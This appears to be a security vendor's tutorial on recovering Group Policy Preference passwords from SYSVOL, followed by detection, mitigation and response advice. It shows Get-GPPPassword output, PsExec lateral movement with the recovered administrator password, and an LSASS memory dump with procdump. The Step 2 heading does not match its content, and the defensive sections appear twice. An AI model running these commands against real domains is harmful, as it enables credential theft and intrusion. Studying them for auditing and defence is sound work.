Plaintext Password Extraction using PowerSploit

Active Directory
Credential Access
Credential Theft

Group Policy is essential in managing an Active Directory environment. In particular, administrators use it to centrally manage configurations applied to domain-joined servers and workstations; these Group Policies define policies (enforced settings) and preferences, which propagate default configurations that a user can modify. 

Unfortunately, Group Policy enabled administrators to embed passwords in Group Policy preferences that created local users or mapped network drives — and those passwords were encrypted with a publicly available key. Therefore, an adversary with the ability to read these policies can readily extract and decrypt these passwords.

In 2014, Microsoft released a security update that removes the ability to create new preferences with embedded passwords, but many organizations still have Group Policy preferences that include embedded passwords.

Threat Summary
Target:
Active Directory
ATT&CK® Tactic:
ATT&CK Technique:
Difficulty
Detection:
Low
Mitigation:
Low
Response:
Low

Attack Tutorial: Plaintext Password Extraction Attack

STEP 1

Discover passwords in Group Policy preferences

Group Policy preferences are stored as XML files in the SYSVOL share on domain controllers. The SYSVOL share is accessible to Authenticated Users, so an adversary who has gained a foothold within the network can access its contents. An adversary can parse these XML files manually, looking for instances of the attribute CPassword, which contains the encrypted passwords. Adjacent attributes provide other details, like the username. Or they can use tools like PowerSploit’s Get-GPPPasswords cmdlet to automate the process of acquiring and decrypting these passwords, as shown below.
PS> Import-Module PowerSploit
PS> Get-GPPPassword
 
Changed   : {2020-08-17 11:14:01}
UserNames : {Administrator (built-in)}
NewName   : [BLANK]
Passwords : {WhatAGreatPassword123!}
File      : \\domain.com\SYSVOL\domain.com\Policies\{5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB}\Machine\Preferences\Groups\Groups.xml
 
PS> 
STEP 2

Modify the AdminSDHolders ACL

Now that the adversary has the username and password for a local administrator, they can enumerate the computers in Active Directory on which the Group Policy is applied, which provides them with a list of computers to which they can authenticate using this credential.

With this list, the adversary can continue to expand their footprint within the organization. In this example, the adversary connects to another computer and creates a memory dump of the LSASS.exe process to enable further lateral movement or privilege escalation.
PS> [XML] $XML = Get-GPO -Guid 5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB | Get-GPOReport -ReportType Xml
 
PS> $XML.GPO.LinksTo
 
SOMName SOMPath       Enabled NoOverride
------- -------       ------- ----------
Comp    domain.com/Comp true    false
 
 
PS> $DN = Get-ADOrganizationalUnit -filter { Name -eq $XML.GPO.LinksTo.SOMName } | Select -expand DistinguishedName
 
PS> Get-ADComputer -filter "*" -SearchBase $DN
 
 
DistinguishedName : CN=Server1,OU=Comp,DC=domain,DC=com
DNSHostName       :
Enabled           : True
Name              : Server1
ObjectClass       : computer
ObjectGUID        : 4eeec15e-ee84-4195-b5c8-ee4d5d67efbf
SamAccountName    : SERVER1$
SID               : S-1-5-21-5840559-2756745051-1363507867-16924
UserPrincipalName :
 
 
PS> .\PSExec.exe -u Administrator -p WhatAGreatPassword123! \\server1 powershell.exe
 
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
 
PS> procdump.exe -accepteula -r -ma lsass.exe lsass.dmp
PS>

Detect, Mitigate and Respond

Detect
Mitigate
Respond
Difficulty: Low
Because of the large volume of read operations occurring in normal operations, it is not possible to directly detect an adversary’s access to these files. However, conducting an audit for passwords embedded in Group Policy Preferences is possible using the same techniques an adversary would use. Using the Get-GPPPassword cmdlet against each domain will enumerate embedded passwords (note that this will also reveal the plaintext). Alternatively, the following PowerShell snippet will enumerate embedded passwords without decrypting them:
# Replace this path with the path to SYSVOL to check
$SYSVOL_Path = "\\domain.com\sysvol"
 
Get-ChildItem $SYSVOL_Path -Recurse -File | Select-String -Pattern "cpassword"
 
# Sample Output using \\domain.com\sysvol
\\domain.com\sysvol\domain.com\Policies\{5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB}\Machine\Preferences\Groups\Groups.xml:2:<Gro
ups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"
name="Administrator (built-in)" image="2" changed="2020-08-17 11:14:01"
uid="{EA0FCA83-45D2-4189-B476-DB595FB29E2D}"><Properties action="U" newName="" fullName="" description="Built-in Local
Admin" cpassword="Pe81R/eXjjPtd5oJw6D0hifqz78ezVt7tD0ViS9eTg+z2dKIvfwMRbD5JPFEA26i" changeLogon="0" noChange="0"
neverExpires="0" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User>
Difficulty: Low
Simply put, all embedded passwords in Group Policy preferences should be removed. Additionally:
  • Ensure that all domain controllers are running current operating system versions with the latest patches, since current versions of Windows Server do not permit the embedding of passwords in Group Policy preferences.
  • Replace the use of Group Policy preferences to set the built-in local administrator account’s password with a robust solution like Microsoft’s Local Administrator Password Solution (LAPS).
  • Adopt solutions that replace embedded passwords with authenticated dynamic lookups.
Difficulty: Low
Should you discover embedded passwords in Group Policy preferences, the following actions can be taken:
  • Remove the embedded password from the Group Policy preference.
  • Reset the password for the account.

Detect
Difficulty: Low
Because of the large volume of read operations occurring in normal operations, it is not possible to directly detect an adversary’s access to these files. However, conducting an audit for passwords embedded in Group Policy Preferences is possible using the same techniques an adversary would use. Using the Get-GPPPassword cmdlet against each domain will enumerate embedded passwords (note that this will also reveal the plaintext). Alternatively, the following PowerShell snippet will enumerate embedded passwords without decrypting them:
# Replace this path with the path to SYSVOL to check
$SYSVOL_Path = "\\domain.com\sysvol"
 
Get-ChildItem $SYSVOL_Path -Recurse -File | Select-String -Pattern "cpassword"
 
# Sample Output using \\domain.com\sysvol
\\domain.com\sysvol\domain.com\Policies\{5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB}\Machine\Preferences\Groups\Groups.xml:2:<Gro
ups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"
name="Administrator (built-in)" image="2" changed="2020-08-17 11:14:01"
uid="{EA0FCA83-45D2-4189-B476-DB595FB29E2D}"><Properties action="U" newName="" fullName="" description="Built-in Local
Admin" cpassword="Pe81R/eXjjPtd5oJw6D0hifqz78ezVt7tD0ViS9eTg+z2dKIvfwMRbD5JPFEA26i" changeLogon="0" noChange="0"
neverExpires="0" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User>
Mitigate
Difficulty: Low
Simply put, all embedded passwords in Group Policy preferences should be removed. Additionally:
  • Ensure that all domain controllers are running current operating system versions with the latest patches, since current versions of Windows Server do not permit the embedding of passwords in Group Policy preferences.
  • Replace the use of Group Policy preferences to set the built-in local administrator account’s password with a robust solution like Microsoft’s Local Administrator Password Solution (LAPS).
  • Adopt solutions that replace embedded passwords with authenticated dynamic lookups.
Respond
Difficulty: Low
Should you discover embedded passwords in Group Policy preferences, the following actions can be taken:
  • Remove the embedded password from the Group Policy preference.
  • Reset the password for the account.

MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation.